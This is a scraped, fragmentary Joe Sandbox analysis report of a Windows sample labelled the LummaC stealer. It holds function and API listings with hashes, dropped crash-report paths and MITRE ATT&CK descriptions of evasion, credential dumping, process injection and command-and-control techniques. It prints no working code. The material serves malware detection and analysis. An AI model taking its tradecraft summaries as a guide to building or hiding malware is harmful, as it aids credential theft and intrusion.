GetSystemMetrics.USER32 ref: 0042EF4F
GetSystemMetrics.USER32 ref: 0042EF60
DeleteObject.GDI32 ref: 0042EFC2
SelectObject.GDI32 ref: 0042F010
SelectObject.GDI32 ref: 0042F0B0
DeleteObject.GDI32 ref: 0042F0E7

Strings

, xrefs: 0042F083

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Object$DeleteMetricsSelectSystem
String ID:
API String ID: 3911056724-3916222277
Opcode ID: 461fbfb80a460c3b39bf0b666b40d54a05e386a3a522afec03fe1f1ee577d6ba
Instruction ID: 26a77810473a649a6d0160a218d90b5f45665e556e32aa297b76d88d748b452a
Opcode Fuzzy Hash: 461fbfb80a460c3b39bf0b666b40d54a05e386a3a522afec03fe1f1ee577d6ba
Instruction Fuzzy Hash: F78159B4A04B00DFC754EF29D595A1ABBF0FB4A310F10896DE99ACB364D731A849CF52

Function 0440ECD7 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207COMMON

Download Yara Rule

APIs

DeleteObject.GDI32 ref: 0440EDEC
SelectObject.GDI32 ref: 0440EE46
SelectObject.GDI32 ref: 0440EED4
DeleteObject.GDI32 ref: 0440EF11

Strings

, xrefs: 0440EEA1

Memory Dump Source

Source File: 00000000.00000002.2032685971.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_43e0000_file.jbxd

Yara matches

Similarity

API ID: Object$DeleteSelect
String ID:
API String ID: 618127014-3916222277
Opcode ID: bcf94c8979bb7764ca8433f98d3f91d2a126e05a4c66d84b124e04768f202066
Instruction ID: 310d5185d0b83dc473f17e3769eb959196bb26dc5e5e8405530b57200d95d8da
Opcode Fuzzy Hash: bcf94c8979bb7764ca8433f98d3f91d2a126e05a4c66d84b124e04768f202066
Instruction Fuzzy Hash: 68914AB4A05B008FD364EF29D981A16BBF0FB49700B104A6DE99AC7760D731F848CF92

Function 0440F13D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

DeleteObject.GDI32 ref: 0440F229
SelectObject.GDI32 ref: 0440F277
SelectObject.GDI32 ref: 0440F317
DeleteObject.GDI32 ref: 0440F34E

Strings

, xrefs: 0440F2EA

Memory Dump Source

Source File: 00000000.00000002.2032685971.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_43e0000_file.jbxd

Yara matches

Similarity

API ID: Object$DeleteSelect
String ID:
API String ID: 618127014-3916222277
Opcode ID: 461fbfb80a460c3b39bf0b666b40d54a05e386a3a522afec03fe1f1ee577d6ba
Instruction ID: 00dd0eaac379997097826ebdf6e17b87ee172a5fdcee64327123fd94795fa0a0
Opcode Fuzzy Hash: 461fbfb80a460c3b39bf0b666b40d54a05e386a3a522afec03fe1f1ee577d6ba
Instruction Fuzzy Hash: 3B816AB4A04B00DFC754EF29D585A1ABBF0FB4A300F10892DE99ACB360D731A848CF52

Function 044073B2 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 462COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 044074DD

Strings

cfbe, xrefs: 0440764F
2PBv, xrefs: 044073D7

Memory Dump Source

Source File: 00000000.00000002.2032685971.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_43e0000_file.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: 2PBv$cfbe
API String ID: 3664257935-2258403321
Opcode ID: a527324a8ce46518951fb6cac3254f6eb5a1fa1805477d40919ed588ff400953
Instruction ID: 1b0936b8e688dca4dad9a616d03536b409a82c239994726c175157de38641bb6
Opcode Fuzzy Hash: a527324a8ce46518951fb6cac3254f6eb5a1fa1805477d40919ed588ff400953
Instruction Fuzzy Hash: 78F17C70504B808EEB25CF34C894BE3BBE1AF56305F084A6DD0EB8B292D779B556CB51

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_e1b8ee67c28e1740921d4bcadce1f30172278_35621c73_1a34e8b5-95ff-4b09-8773-76e45477dcb2\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER10D5.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1105.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREC0.tmp.dmp

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Windows Analysis Report
file.exe

Function 0040A660 Relevance: 23.0, Strings: 18, Instructions: 467
COMMON

Function 0042EA70 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 207
COMMON

Function 00420CED Relevance: 11.8, Strings: 9, Instructions: 516
COMMON

Function 00418192 Relevance: 10.8, Strings: 8, Instructions: 776
COMMON

Function 00410950 Relevance: 10.4, Strings: 8, Instructions: 384
COMMON

Function 00418C50 Relevance: 9.2, Strings: 7, Instructions: 425
COMMON

Function 0041003F Relevance: 9.1, Strings: 7, Instructions: 394
COMMON

Function 00416C48 Relevance: 8.0, Strings: 6, Instructions: 457
COMMON

Function 043E003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Function 0042714B Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 462
COMMON